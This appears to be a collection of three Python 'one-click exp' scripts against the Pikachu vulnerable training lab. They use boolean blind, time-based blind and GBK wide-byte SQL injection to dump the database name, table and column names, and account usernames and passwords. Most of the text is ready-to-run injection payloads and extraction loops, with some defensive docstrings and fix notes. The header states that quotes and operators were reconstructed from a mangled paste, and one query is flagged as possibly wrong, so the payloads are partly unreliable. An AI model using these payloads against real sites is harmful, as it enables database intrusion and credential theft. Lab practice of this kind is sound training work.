Pikachu的python一键exp,盲注(base on boolian),盲注(base on time),宽字节注入
# Reconstructed from a whitespace-mangled paste: quotes, `=`, `+`, `<`, `>`
# and `&` were stripped by extraction and are restored from context below, so
# payload and message literals are reconstructions rather than verbatim text.
#
# All three scripts run against Pikachu, a deliberately vulnerable training
# application, on 127.0.0.1. The shared root cause is that the page's `name`
# field reaches the SQL statement as text instead of a bound parameter;
# prepared statements / parameterized queries remove the whole class.
# The scripts are three separate files on the page; each section repeats
# its own imports and configuration exactly as the page does.

# ====================== 1.盲注(base on boolian) ======================
import requests
import time

# 盲注(boolian)
# Configuration: the two marker strings must match the page's own replies.
url = "http://127.0.0.1/pikachu-master/vul/sqli/sqli_blind_b.php"
base_params = {
    "name": "",
    "submit": "查询",
}
TRUE_TEXT = "your uid"          # shown when the injected condition holds
FALSE_TEXT = "username不存在"    # shown when it does not


def bool_check(payload):
    """Send *payload* as the ``name`` parameter and classify the reply.

    Returns True only when the reply contains TRUE_TEXT and not FALSE_TEXT.
    Any exception raised by the request (timeout, connection refused, ...)
    is reported as False, so an unreachable target silently reads as
    "no match"; the bare ``except`` also swallows KeyboardInterrupt.

    Defensive note: one request is issued per (position, candidate byte)
    below, so the server sees long runs of near-identical requests whose
    only variation is a numeric comparison inside ``name`` -- a pattern
    request logging or a WAF rule can key on.
    """
    query = dict(base_params, name=payload)
    try:
        body = requests.get(url, params=query, timeout=3).text
    except:
        return False
    return TRUE_TEXT in body and FALSE_TEXT not in body


def get_length(sql):
    """Return the length of the result of *sql*, probing 1..49; 0 if none match."""
    for n in range(1, 50):
        if bool_check(f"kobe' and length(({sql}))={n}#"):
            return n
    return 0


def get_content(sql):
    """Recover the result of *sql* one character at a time.

    Only printable ASCII 32..126 is tried; a position with no match is
    skipped silently, so the returned string may be shorter than the
    length reported by get_length().
    """
    total = get_length(sql)
    found = ""
    for pos in range(1, total + 1):
        for code in range(32, 127):
            probe = f"kobe' and ascii(substr(({sql}),{pos},1))={code}#"
            if bool_check(probe):
                found += chr(code)
                print(f"\r[+] 已获取{found}", end="")
                break
    return found


# 开始脱库 (runs at import; the script has no __main__ guard)
print("=" * 60)
print(" PIKACHU 布尔盲注 ")
print("=" * 60)
print("\n[1] 数据库名", end="")
db_name = get_content("select database()")
print(f" {db_name}")
print("\n[2] 所有表名", end="")
tables = get_content(
    "select group_concat(table_name) from information_schema.tables "
    "where table_schema=database()"
)
print(f" {tables}")
print("\n[3] member 字段", end="")
cols = get_content(
    "select group_concat(column_name) from information_schema.columns "
    "where table_schema=database() and table_name='member'"
)
print(f" {cols}")
print("\n[4] 账号密码", end="")
data = get_content("select group_concat(username,':',pw) from member")
print(f" {data}")
print("\n✅ 脱库完成")


# ======================= 2.盲注(base on time) ========================
import requests
import time

# 【必须是时间盲注页面】 -- this section only works against the time-based page
url = "http://127.0.0.1/pikachu-master/vul/sqli/sqli_blind_t.php"
base_params = {"name": "", "submit": "查询"}
SLEEP = 2  # seconds the injected sleep() asks for; also the decision threshold


def time_check(payload):
    """Send *payload* and return True if the round trip took at least SLEEP.

    The request timeout (5 s) is larger than SLEEP (2 s) and the bare
    ``except: pass`` keeps the timing measurement, so a request that times
    out is counted as "true" (false positive on a slow or unreachable
    target), while a fast failure such as connection refused reads as
    "false". Timing-based probes are inherently noisy; the comparison
    operator here is reconstructed.

    Defensive note: the payload carries a literal ``sleep(`` call and the
    response times cluster at the requested delay -- both are visible to
    query logging and slow-query monitoring.
    """
    query = dict(base_params, name=payload)
    t0 = time.time()
    try:
        requests.get(url, params=query, timeout=5)
    except:
        pass
    return time.time() - t0 >= SLEEP


def get_length(sql):
    """Return the length of the result of *sql*, probing 1..49; 0 if none match."""
    for n in range(1, 50):
        probe = f"kobe' and if(length(({sql}))={n}, sleep({SLEEP}), 1)#"
        if time_check(probe):
            return n
    return 0


def get_content(sql):
    """Recover the result of *sql* character by character via timing.

    Same search space and skip behaviour as the boolean version; each
    position costs up to 95 requests, each "hit" costing SLEEP seconds.
    """
    total = get_length(sql)
    found = ""
    for pos in range(1, total + 1):
        for code in range(32, 127):
            probe = (
                f"kobe' and if(ascii(substr(({sql}),{pos},1))={code}, "
                f"sleep({SLEEP}), 1)#"
            )
            if time_check(probe):
                found += chr(code)
                print(f"\r[+] 已获取{found}", end="")
                break
    return found


# 开始 (runs at import; no __main__ guard)
print("=" * 60)
print(" PIKACHU 时间盲注 ")
print("=" * 60)
print("\n数据库名", end="")
db = get_content("select database()")
print(f" {db}")
print("\n表名", end="")
tables = get_content(
    "select group_concat(table_name) from information_schema.tables "
    "where table_schema=database()"
)
print(f" {tables}")
print("\n字段", end="")
cols = get_content(
    "select group_concat(column_name) from information_schema.columns "
    "where table_schema=database() and table_name='member'"
)
print(f" {cols}")
print("\n账号密码", end="")
data = get_content("select group_concat(username,':',pw) from member")
print(f" {data}")
print("\n✅ 脱库完成")


# =========================== 3.宽字节注入 ============================
import requests

target = "http://127.0.0.1/pikachu-master/vul/sqli/sqli_widebyte.php"
headers = {"Content-Type": "application/x-www-form-urlencoded"}


def exp(payload):
    """POST *payload* as a raw form-encoded body and parse the reply.

    Returns ``(uid, email)`` cut out of the page between the markers
    ``"your uid:"`` / ``"<br />"`` and ``"your email is:"`` / ``"</p>"``,
    or ``(None, None)`` when the uid marker is absent. Parsing is plain
    positional splitting: if the uid marker is present but the email
    marker is not, the ``[1]`` index raises IndexError.

    Why the page is exploitable: the ``%df`` byte placed before the quote
    in each payload relies on the server escaping the quote with a
    backslash while the database connection decodes a GBK-family charset,
    so the escape byte is absorbed into a two-byte character. The fix is
    a consistently declared connection charset plus parameterized queries,
    not character escaping.
    """
    body = requests.post(target, data=payload.encode(), headers=headers).text
    if "your uid:" not in body:
        return None, None
    uid = body.split("your uid:")[1].split("<br />")[0].strip()
    email = body.split("your email is:")[1].split("</p>")[0].strip()
    return uid, email


if __name__ == "__main__":
    print(" Pikachu 宽字节注入 全套EXP \n")
    # 1. 查询库名 + 版本
    u1, e1 = exp(
        "name=1%df' union select database(),version() #"
        "&submit=%E6%9F%A5%E8%AF%A2"
    )
    print(f"[1] 当前数据库{u1}")
    print(f"[2] MySQL版本{e1}\n")
    # 2. 查询所有表名
    u2, e2 = exp(
        "name=1%df' union select 1,group_concat(table_name) "
        "from information_schema.tables where table_schema=database() #"
        "&submit=%E6%9F%A5%E8%AF%A2"
    )
    print(f"[3] 全部数据表{e2}\n")
    # 3. ✅ 修复: 查询users表所有字段, 加反引号
    # NOTE(review): the page says the table name was wrapped in backticks;
    # in MySQL backticks quote an identifier, not a string, so confirm this
    # query actually returns the column list against the lab.
    u3, e3 = exp(
        "name=1%df' union select 1,group_concat(column_name) "
        "from information_schema.columns where table_schema=database() "
        "and table_name=`users` #"
        "&submit=%E6%9F%A5%E8%AF%A2"
    )
    print(f"[4] users表字段{e3}\n")
    # 4. 爆账号密码
    u4, e4 = exp(
        "name=1%df' union select username,password from users limit 0,1 #"
        "&submit=%E6%9F%A5%E8%AF%A2"
    )
    print(f"[5] 账号{u4}")
    print(f"[6] 密码{e4}")